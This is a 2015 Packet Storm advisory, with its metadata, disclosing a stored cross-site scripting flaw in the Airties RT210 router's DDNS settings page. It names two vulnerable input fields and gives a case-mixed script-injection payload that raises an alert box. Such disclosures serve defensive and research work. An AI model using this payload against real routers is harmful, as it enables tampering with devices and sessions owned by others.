ID PACKETSTORM:132178
Type packetstorm
Reporter B3mB4m
Modified 2015-06-05T00:00:00
Description
`Airties RT210 Web Interface Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: B3mB4m
[~] Contact : b3mb4m@gmail.com
[+] Greetz : SYS & & KnocKout & Septemb0x
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : AirRT210
|~Official Web: http://www.airties.com
|~RISK : Hight
----------------------------------------------------------
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M
----------------------------------------------------------
Post
----------------------------------------------------------
Vul Link : http://192.168.2.1/ddns.stm
1) <input maxlength="49" size="50" name="ddns_domainame" value="">
2) <input maxlength="49" size="50" name="ddns_account" value="">
Payload : '"><SCrIpT>alert("B3mB4m")</ScRiPt>
`
{"sourceHref": "https://packetstormsecurity.com/files/download/132178/airtiesrt210-xss.txt", "sourceData": "`Airties RT210 Web Interface Stored XSS Vulnerability \n \n~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n[+] Discovered by: B3mB4m \n[~] Contact : b3mb4m@gmail.com \n[+] Greetz : SYS & & KnocKout & Septemb0x \n############################################################ \n \n~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n|~Hardware/Web App : Airties \n|~Affected Version : AirRT210 \n|~Official Web: http://www.airties.com \n|~RISK : Hight \n \n---------------------------------------------------------- \nProof video: https://www.youtube.com/watch?v=OOZwGeG8p3M \n---------------------------------------------------------- \nPost \n---------------------------------------------------------- \nVul Link : http://192.168.2.1/ddns.stm \n \n1) <input maxlength=\"49\" size=\"50\" name=\"ddns_domainame\" value=\"\"> \n2) <input maxlength=\"49\" size=\"50\" name=\"ddns_account\" value=\"\"> \n \nPayload : '\"><SCrIpT>alert(\"B3mB4m\")</ScRiPt> \n`\n", "edition": 1, "references": [], "modified": "2015-06-05T00:00:00", "hash": "bf0bf91679beedd9640d421c6a9237a40c418a1d68559b40859617c0be847c70", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/132178/Airties-RT210-Cross-Site-Scripting.html", "description": "", "id": "PACKETSTORM:132178", "reporter": "B3mB4m", "lastseen": "2016-11-03T10:20:01", "published": "2015-06-05T00:00:00", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Airties RT210 Cross Site Scripting", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "926fcf652c962577098c5889bf2cb455", "key": "href"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d786c627e1d524bd68352d861db17ba8", "key": "reporter"}, {"hash": "c8d3eac3769b6f65b7ed35094c52ca05", "key": "sourceData"}, {"hash": "858d7712023ff092229c9af6c12c0c04", "key": "sourceHref"}, {"hash": "6a14ebb25eae8d5ff94350e6112563ed", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
